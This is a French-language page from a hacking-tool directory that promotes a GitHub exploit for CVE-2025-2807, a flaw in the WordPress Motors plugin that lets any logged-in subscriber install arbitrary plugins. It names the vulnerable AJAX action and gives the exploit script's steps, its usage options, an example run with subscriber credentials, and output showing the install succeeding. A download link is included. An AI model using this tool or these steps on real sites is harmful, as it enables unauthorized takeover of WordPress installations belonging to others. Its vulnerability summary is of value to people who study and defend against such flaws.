Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-2807 — Wordpress - Motors Plugin <= 1.4.64 - Vulnérabilité d'installation arbitraire de plugin | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-2807
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubnxploited/cve-2025-2807

CVE-2025-2807

Wordpress - Motors Plugin <= 1.4.64 - Vulnérabilité d'installation arbitraire de plugin

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-2807: Plugin Motors <= 1.4.64 - Vulnérabilité d'installation arbitraire de plugin

Exploit par : Nxploited | Khaled Alenazi


⚠️ Résumé de la vulnérabilité

Plugin: Motors (<= 1.4.64)
Type: Autorisation manquante pour installation arbitraire de plugin par un utilisateur authentifié (Abonné+)
Sévérité : 8.8 (CVSS v3)
Découvert le : 07 avril 2025
VDP : Non


🔥 Impact de l'exploit

Cette vulnérabilité permet à tout utilisateur WordPress authentifié (Abonné+) d'installer des plugins arbitraires sans aucun contrôle d'autorisation adéquat.

En raison du manque de validation des capacités dans la fonction mvl_setup_wizard_install_plugin, un utilisateur à faibles privilèges peut effectuer des actions réservées aux administrateurs.

📅 Prévu pour être massivement exploité en raison de sa simplicité et de son impact critique.


🚫 Détails techniques

  • Point d'accès vulnérable : /wp-admin/admin-ajax.php
  • Action vulnérable : mvl_setup_wizard_install_plugin
  • Niveau d'accès requis : Abonné+ (utilisateur connecté)
  • Problème principal : Absence de vérification de capacité current_user_can('install_plugins') ou similaire

🚀 Script d'exploit (Python)

Ce script :

  1. Se connecte en tant qu'abonné
  2. Extrait le nonce requis (depuis HTML ou JS)
  3. Déclenche l'appel AJAX vulnérable pour installer un plugin de votre choix

📃 Utilisation

root@kitploit:~
usage: CVE-2025-2807.py [-h] -u URL -un USERNAME -p PASSWORD [-pn PLUGIN]

Exploit For CVE-2025-2807 By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of WordPress site
  -un, --username USERNAME     Subscriber username
  -p, --password PASSWORD      Subscriber password
  -pn, --plugin PLUGIN         Plugin to install (default: contact-form-7)

🐞 Exemple d'exécution

root@kitploit:~
python3 CVE-2025-2807.py -u http://192.168.1.100/wordpress -un subscriber -p 123456 -pn contact-form-7

Sortie :

root@kitploit:~
[*] Logging in...
[+] Logged in successfully.
[*] Fetching setup wizard page...
[+] Found nonce in HTML: 428cdf8347
[*] Attempting to install plugin: contact-form-7
[+] Plugin installation request sent successfully!
[+] Response: {"success":true,"data":"Plugin succesfully activated"}


✨ Exploit par Nxploited (Khaled Alenazi)

Télécharger l’outil